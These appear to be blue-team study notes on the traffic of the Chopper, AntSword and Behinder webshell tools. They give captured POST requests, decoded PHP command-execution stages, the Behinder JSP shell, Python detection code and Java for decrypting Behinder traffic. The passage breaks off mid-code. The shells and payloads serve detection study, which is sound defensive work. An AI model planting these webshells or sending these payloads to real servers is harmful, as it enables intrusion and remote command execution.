Traffic characteristics of common attack and defense tools
Preface: this came up in a blue-team HVV (护网) interview, so here are my study notes on the traffic characteristics of the tools and techniques involved.
Chopper 2016 (菜刀2016) traffic characteristics
PHP one-liner shell
<?php @eval($_POST[1]);?>
First connection request
The routine is always the same: array_map() is called with assert as the callback; the string handed to assert builds the name base64_decode from concatenated fragments, then eval()s the base64-decoded stage.
POST /test5.php HTTP/1.1
X-Forwarded-For: 75.240.223.112
Referer: https://yyhb.lousw.net/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: yyhb.lousw.net
Content-Length: 674
Cache-Control: no-cache
Connection: close

1=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"));
The base64 decodes to:
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
A normal directory-listing request
POST /test5.php HTTP/1.1
X-Forwarded-For: 75.240.223.112
Referer: https://yyhb.lousw.net/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: yyhb.lousw.net
Content-Length: 792
Cache-Control: no-cache
Connection: close

1=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('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%3D'));\");"));
This stage uses opendir() together with readdir() to enumerate the directory.
The base64 decodes to:
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/www/wwwroot/yyhb.lousw.net/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
whoami execution traffic
In an environment with normal AV/WAF protection this request is blocked outright. The request looks like this:
POST /test5.php HTTP/1.1
X-Forwarded-For: 75.240.223.112
Referer: https://yyhb.lousw.net/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: yyhb.lousw.net
Content-Length: 808
Cache-Control: no-cache
Connection: close

1=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nL2Jpbi9zaCc7JHM9J2NkIC93d3cvd3d3cm9vdC95eWhiLmxvdXN3Lm5ldC87d2hvYW1pO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXSc7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI%2FIi1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiOyRyPSJ7JHB9IHskY30iOyRhcnJheT1hcnJheShhcnJheSgicGlwZSIsInIiKSxhcnJheSgicGlwZSIsInciKSxhcnJheSgicGlwZSIsInciKSk7JGZwPXByb2Nfb3Blbigkci4iIDI%2BJjEiLCRhcnJheSwkcGlwZXMpOyRyZXQ9c3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0pO3Byb2NfY2xvc2UoJGZwKTtwcmludCAkcmV0OztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"));
The base64 decodes to the following. Unlike the previous stages, this one spawns the command directly through proc_open(), which is what gets it blocked:
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /www/wwwroot/yyhb.lousw.net/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
Summary of traffic features
1. Base64 strings plus string-concatenation obfuscation in the POST body ("ass"."ert", "ev"."Al", "Ba"."SE6"."4_dEc"."OdE")
2. Every stage begins with @ini_set("display_errors","0"), so its base64 encoding always begins with QGluaV9zZ
3. array_map() used to invoke the execution function (assert)
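As an added example (not Chopper's code and not from the original post), the following Python checks a POST body for the three features just listed, extracts the base64 stage from the wrapper and classifies it by the PHP functions it calls. The request body is constructed in the same shape as the captures above, but with a short hand-written stage in place of the real one.

```python
import base64
import re
from urllib.parse import quote, unquote_plus

# Constructed sample: the exact wrapper Chopper 2016 sends (see the captures above),
# with a short hand-written stage so the example stays readable.
CHOPPER_STAGE = (
    b'@ini_set("display_errors","0");@set_time_limit(0);'
    b'echo("X@Y");print php_uname();echo("X@Y");die();'
)
_TEMPLATE = r'''1=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('{B64}'));\");"));'''
SAMPLE_BODY = _TEMPLATE.replace(
    "{B64}", quote(base64.b64encode(CHOPPER_STAGE).decode(), safe=""))
BENIGN_BODY = "username=alice&password=hunter2"

# Base64 of '@ini_set(' -- the first 9 characters of every Chopper stage ("QGluaV9zZ").
STAGE_PREFIX_B64 = base64.b64encode(b'@ini_set("display_errors","0")').decode()[:9]


def chopper_indicators(body: str) -> dict:
    """Check a form-encoded POST body for the Chopper 2016 wrapper features."""
    decoded = unquote_plus(body)
    # Undo PHP string concatenation so "ass"."ert" reads as "assert", etc.
    joined = re.sub(r'"\s*\.\s*"', "", decoded)
    return {
        "array_map_callback": re.search(r'array_map\(\s*"assert"', joined) is not None,
        "concat_obfuscation": '"ass"."ert"' in decoded or '"ev"."Al' in decoded,
        "eval_of_base64": re.search(r"eval\(", joined, re.I) is not None
                          and "base64_decode" in joined.lower(),
        "stage_prefix": STAGE_PREFIX_B64 in decoded,
    }


def extract_stage(body: str):
    """Return the decoded base64 literal passed to the decoder call, or None."""
    m = re.search(r"\('([A-Za-z0-9+/=]{16,})'\)", unquote_plus(body))
    return base64.b64decode(m.group(1)) if m else None


def classify_stage(stage: bytes) -> str:
    """Rough action classification using the function names seen in the decoded stages."""
    s = stage.decode("utf-8", "replace")
    if re.search(r"\b(proc_open|popen|system|passthru|shell_exec|exec)\(", s):
        return "command execution"
    if "opendir(" in s:
        return "directory listing"
    if "php_uname(" in s:
        return "host fingerprint"
    return "unknown"


if __name__ == "__main__":
    print(chopper_indicators(SAMPLE_BODY))
    print(classify_stage(extract_stage(SAMPLE_BODY)))
```

The concatenation-joining step matters more than any single keyword: a rule that looks for the literal string assert never fires on "ass"."ert", but after re-joining the fragments the array_map("assert", ...) shape and the base64_decode name are both plainly visible.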
AntSword (蚁剑) traffic characteristics
Without obfuscation or encryption
First connection
POST /test.php HTTP/1.1
Host: dvwa.io:80
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 983
Connection: close

1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%223addd%22%3Becho%20%40asenc(%24output)%3Becho%20%226595f%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
URL-decoded and formatted (the %09 sequences are tabs, written as \t below):
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) { return $out; };
function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "3addd";
    echo @asenc($output);
    echo "6595f";
}
ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}\t";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= "\t";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= "\t{$s}";
    echo $R;;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
Directory listing
POST /test.php HTTP/1.1
Host: dvwa.io:80
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1056
Connection: close

1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22e3e22%22%3Becho%20%40asenc(%24output)%3Becho%20%22c9124%22%3B%7Dob_start()%3Btry%7B%24D%3Dbase64_decode(%24_POST%5B%220x1a6f8a0c3079a%22%5D)%3B%24F%3D%40opendir(%24D)%3Bif(%24F%3D%3DNULL)%7Becho(%22ERROR%3A%2F%2F%20Path%20Not%20Found%20Or%20No%20Permission!%22)%3B%7Delse%7B%24M%3DNULL%3B%24L%3DNULL%3Bwhile(%24N%3D%40readdir(%24F))%7B%24P%3D%24D.%24N%3B%24T%3D%40date(%22Y-m-d%20H%3Ai%3As%22%2C%40filemtime(%24P))%3B%40%24E%3Dsubstr(base_convert(%40fileperms(%24P)%2C10%2C8)%2C-4)%3B%24R%3D%22%09%22.%24T.%22%09%22.%40filesize(%24P).%22%09%22.%24E.%22%0A%22%3Bif(%40is_dir(%24P))%24M.%3D%24N.%22%2F%22.%24R%3Belse%20%24L.%3D%24N.%24R%3B%7Decho%20%24M.%24L%3B%40closedir(%24F)%3B%7D%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&0x1a6f8a0c3079a=RDovcGhwc3R1ZHlfcHJvL1dXVy9kdndhLw%3D%3D
URL-decoded (the extra parameter 0x1a6f8a0c3079a carries the target path; its value RDovcGhwc3R1ZHlfcHJvL1dXVy9kdndhLw== base64-decodes to D:/phpstudy_pro/WWW/dvwa/):
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "e3e22";echo @asenc($output);echo "c9124";}ob_start();try{$D=base64_decode($_POST["0x1a6f8a0c3079a"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
whoami
POST /test.php HTTP/1.1
Host: dvwa.io:80
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1781
Connection: close

1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22a7e04%22%3Becho%20%40asenc(%24output)%3Becho%20%22b50a5%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(%24_POST%5B%220x6385c50bfea6c%22%5D)%3B%24s%3Dbase64_decode(%24_POST%5B%220x704229de4a3ce%22%5D)%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3B%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C%202048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&0x6385c50bfea6c=Y21k&0x704229de4a3ce=Y2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xcZHZ3YSImd2hvYW1pJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
Decoded content (0x6385c50bfea6c is the base64 of cmd and 0x704229de4a3ce the base64 of cd /d "D:\\phpstudy_pro\\WWW\\dvwa"&whoami&echo [S]&cd&echo [E]; the %0A in join() is a newline, written as \n below):
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "a7e04";echo @asenc($output);echo "b50a5";}ob_start();try{$p=base64_decode($_POST["0x6385c50bfea6c"]);$s=base64_decode($_POST["0x704229de4a3ce"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runcmd($c){$ret=0;if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("\n",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp, 2048));}@pclose($fp);}elseif(fe('antsystem')){@antsystem($c);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
Summary
1. Like Chopper, one constant feature is @ini_set("display_errors", "0");
2. The command-execution payload contains many execution-related keywords: array_map, system, passthru, shell_exec, exec, popen, base64_decode
3. The output is wrapped in two random five-character delimiters (e.g. 3addd ... 6595f), generated fresh for each request
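As an added example (not AntSword's code and not from the original post), the following Python parses a request of the shape captured above, flags the three summary features, decodes the base64 arguments carried in the 0x-named parameters, and uses the per-request delimiters from the request to cut the shell output out of the matching response. The request, response, delimiter values and parameter name are all constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote

# Constructed request/response pair in the same shape as the directory-listing capture above
# (shortened PHP, made-up delimiters e3e22/c9124 and a made-up 0x parameter name).
_PHP = (
    '@ini_set("display_errors", "0");@set_time_limit(0);'
    'function asenc($out){return $out;};'
    'function asoutput(){$output=ob_get_contents();ob_end_clean();'
    'echo "e3e22";echo @asenc($output);echo "c9124";}'
    'ob_start();try{$D=base64_decode($_POST["0x1a6f8a0c3079a"]);'
    '$F=@opendir($D);echo $D;@closedir($F);}'
    'catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();'
)
SAMPLE_REQUEST = (
    "1=" + quote(_PHP, safe="")
    + "&0x1a6f8a0c3079a=" + quote(base64.b64encode(b"D:/phpstudy_pro/WWW/dvwa/").decode(), safe="")
)
# asoutput() echoes delimiter + buffered output + delimiter; anything else on the page is noise.
SAMPLE_RESPONSE = "<html><body>e3e22D:/phpstudy_pro/WWW/dvwa/c9124</body></html>"

DELIM_RE = re.compile(r'echo\s+"(\w{5})";\s*echo\s+@asenc\(\$output\);\s*echo\s+"(\w{5})";')
HEX_PARAM_RE = re.compile(r"_?0x[0-9a-f]+")   # "0x..." in plain mode, "_0x..." with the base64 encoder
EXEC_FUNCS = ("base64_decode", "opendir", "system", "passthru", "shell_exec", "exec", "popen", "proc_open")


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    return dict(parse_qsl(body, keep_blank_values=True))


def antsword_indicators(body: str) -> dict:
    fields = parse_form(body)
    # The PHP stage sits in whichever field is the shell's own parameter name ("1" here).
    php = next((v for v in fields.values() if "@ini_set(" in v), "")
    m = DELIM_RE.search(php)
    return {
        "display_errors_off": '@ini_set("display_errors", "0")' in php,
        "hex_params": [k for k in fields if HEX_PARAM_RE.fullmatch(k)],
        "delimiters": m.groups() if m else None,
        "exec_funcs": [f for f in EXEC_FUNCS if re.search(r"\b" + f + r"\(", php)],
    }


def decode_hex_params(body: str) -> dict:
    """AntSword passes arguments base64-encoded in the 0x parameters; decode them (None if not base64)."""
    out = {}
    for k, v in parse_form(body).items():
        if HEX_PARAM_RE.fullmatch(k):
            try:
                out[k] = base64.b64decode(v, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                out[k] = None
    return out


def extract_response(resp_body: str, delims):
    """Cut the shell output out of the response using the delimiters taken from the request."""
    start, end = delims
    i, j = resp_body.find(start), resp_body.rfind(end)
    if i < 0 or j < 0 or j < i:
        return None
    return resp_body[i + len(start):j]


if __name__ == "__main__":
    ind = antsword_indicators(SAMPLE_REQUEST)
    print(ind)
    print(decode_hex_params(SAMPLE_REQUEST))
    print(extract_response(SAMPLE_RESPONSE, ind["delimiters"]))
```

The delimiter regex is the piece worth keeping: because the delimiters are random per request, the only reliable way to recover the shell output from a response is to read them out of the request that produced it, which is exactly what the response-side asoutput() framing lets a sensor do.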
Extended notes
With the base64 encoder enabled, as shown in the figure below (image not preserved),
the features are still present:
1. After base64_decode the same features appear in the decoded payload
2. The parameter names start with _0x
3. The eval string
Newer AntSword versions let the user customise the delimiters, as shown in the figure below (image not preserved).
These three points can still be used as detection features.
Behinder (冰蝎) traffic characteristics
Behinder 3.0 source for reference: https://github.com/MountCloud/BehinderClientSource
Related issue: https://github.com/MountCloud/BehinderClientSource/issues/8
The analysis here is of the JSP shell:
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
    class U extends ClassLoader {
        U(ClassLoader c) { super(c); }
        public Class g(byte[] b) { return super.defineClass(b, 0, b.length); }
    }
%>
<%
    if (request.getMethod().equals("POST")) {
        String k = "e45e329feb5d925b"; /* first 16 characters of the 32-character MD5 of the connection password; default password is rebeyond */
        session.putValue("u", k);
        Cipher c = Cipher.getInstance("AES");
        // initialise for decryption (2 == Cipher.DECRYPT_MODE)
        c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
        // base64-decode the body, AES-decrypt it, define and instantiate the class, then call equals()
        new U(this.getClass().getClassLoader()).g(
            c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))
        ).newInstance().equals(pageContext);
    }
%>
Knowledge point: why does the shell's class loader subclass ClassLoader instead of calling defineClass() directly?
ClassLoader.defineClass() is protected, so it cannot be called from arbitrary code. Subclassing ClassLoader and calling the parent's defineClass() from inside the subclass (here via g()) gets around that restriction.
Traffic observation
Reference article: https://zgao.top/冰蝎v2-0-1-动态二进制加密网站管理客户端源码分析/
Communication flow diagram from the Behinder author, shown below (image not preserved)
First connection
The first connection consists of two packets. Note that this shell hardcodes the key (Behinder 3.x), so unlike Behinder 2.x there is no key-negotiation handshake: the two packets are the Echo connectivity check and the BasicInfo query, both decrypted further down.
Behinder encrypts the data with AES-128 by default; the 16-byte key is the first 16 characters of the MD5 of the connection password.
First, the first packet:
POST /web_demo/shell.jsp HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-Type: application/octet-stream
Referer: http://127.0.0.1:8080/web_demo/shell.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Pragma: no-cache
Host: 127.0.0.1:8080
Content-Length: 10712
Connection: close

UdpdzPiwMfQSLKKtRSD8CkZXdpB38xA7sY23E7YQTWrmw8Yjl9T78BEsNzXN9AWwn/l7pp9i0+1/SQALdR2AcFtnpJWjbzQdZ5eN+SsP0vLKJxLseeJoigz8hJpU9O9l+7fO3uuxjWOJkYHzWKb9IGBPvH5VzIj2dn4WjWbDdpUf8dcMBH02e0Q6OcZGE+MHrBqn2zHftNF3UUjqZoj1OHth+WxNh97DOeN60htjugFsRKtm4yd/hgCElPnUzpfX3wkRWlUu8dL/NoQMrBYvaTkLvhLMDS+5yzX8A8xOg8TKUK9HqE8aQj61ZaxTZY6clZd0qQOaTx2ovZdqwtMW4NFBI+OGfWp7kL9HEzOSSbwSNkxi36cINgzqYGLDcikx4xR7+XcchAePPmcW7GRj/zxziCEUS7m+7CqhaOaKee/mTtoHuLSVw0Wmc7JiWnNhKIeGhqWYA1eS0MMSdrq6M/Zn1h5C06ea/A3kV1w1MhnsXDM8xk8H5c4p5bdK4E/wTnTFxkjxnVfJ8+8xS+zgG9HUEgB3FzcOfsTOjEltYoLuEG3gidnjPQpjdn3LRTfdpKBeotMtKUtG9amQ55UsFuw2NmMWpR6zDeebyKrs9AFqHAxB/Tjk0f8H18w1cUaU+uEM... (truncated)
The response is shown below. It sets a session cookie, JSESSIONID=ABDDCE88AB67394B2DB7E73A1BAEBDAA;
this session id ABDDCE88AB67394B2DB7E73A1BAEBDAA is used as the identifier for all later communication.
HTTP/1.1 200
Set-Cookie: JSESSIONID=ABDDCE88AB67394B2DB7E73A1BAEBDAA; Path=/web_demo; HttpOnly
Content-Type: text/html;charset=UTF-8
Date: Sun, 12 Jun 2022 07:27:48 GMT
Connection: close
Content-Length: 3104

(body omitted: it is AES-encrypted and not readable)
The client then carries this session id as the conversation identifier and sends the second packet.
That completes the first connection; from then on each action needs only a single request.
One problem remains: the packets are encrypted and unreadable. They can be decrypted with the following code (sun.misc.BASE64Decoder, which the shell itself uses, is replaced here by java.util.Base64 so it compiles on current JDKs):
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.util.Base64;

public class TestCode {
    public static void main(String[] args) throws Exception {
        String k = "e45e329feb5d925b"; /* first 16 characters of the 32-character MD5 of the connection password; default password is rebeyond */
        Cipher c = Cipher.getInstance("AES");
        // initialise for decryption (2 == Cipher.DECRYPT_MODE), same as the shell
        c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(k.getBytes(), "AES"));
        // base64-decode, then AES-decrypt the request body captured from the client
        byte[] bytes = c.doFinal(Base64.getDecoder().decode("<base64 body of the captured client request>"));
        System.out.println(new String(bytes));
    }
}
Running it prints the decrypted bytes. Since, as seen above, the payload is a class loaded dynamically from bytecode, actually reading the code requires writing the decrypted bytes to a .class file and decompiling it:
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.io.File;
import java.io.FileOutputStream;
import java.util.Base64;

public class TestCode {
    public static void main(String[] args) throws Exception {
        String k = "e45e329feb5d925b"; /* first 16 characters of the 32-character MD5 of the connection password; default password is rebeyond */
        Cipher c = Cipher.getInstance("AES");
        c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(k.getBytes(), "AES"));
        // base64-decode, then AES-decrypt the request body captured from the client
        byte[] bytes = c.doFinal(Base64.getDecoder().decode("<base64 body of the captured client request>"));
        // write the raw bytecode out so it can be decompiled
        try (FileOutputStream fileOutputStream = new FileOutputStream(new File("aaa.class"))) {
            fileOutputStream.write(bytes);
        }
    }
}
The decrypted result, opened from aaa.class, is shown below (image not preserved). In the Behinder source this corresponds to the module net.rebeyond.behinder.payload.java.Echo.
Once this bytecode has been sent, the class loader inside the webshell takes over:
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance()
This call defines the class through defineClass() and instantiates it, i.e. the Xoaf class contained in aaa.class, and then calls its equals() method. Following into aaa.class, equals() looks like this:
equals() performs the requested operation, then encrypts the result and writes it back: write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8")));
public boolean equals(Object obj) {
    HashMap result = new HashMap();
    boolean var13 = false;
    Object so;
    Method write;
    label95: {
        try {
            var13 = true;
            this.fillContext(obj);
            result.put("status", "success");
            result.put("msg", content);
            var13 = false;
            break label95;
        } catch (Exception var19) {
            result.put("msg", var19.getMessage());
            result.put("status", "success");
            var13 = false;
        } finally {
            if (var13) {
                try {
                    so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response);
                    write = so.getClass().getMethod("write", byte[].class);
                    write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8")));
                    so.getClass().getMethod("flush").invoke(so);
                    so.getClass().getMethod("close").invoke(so);
                } catch (Exception var16) {
                }
            }
        }
        try {
            so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response);
            write = so.getClass().getMethod("write", byte[].class);
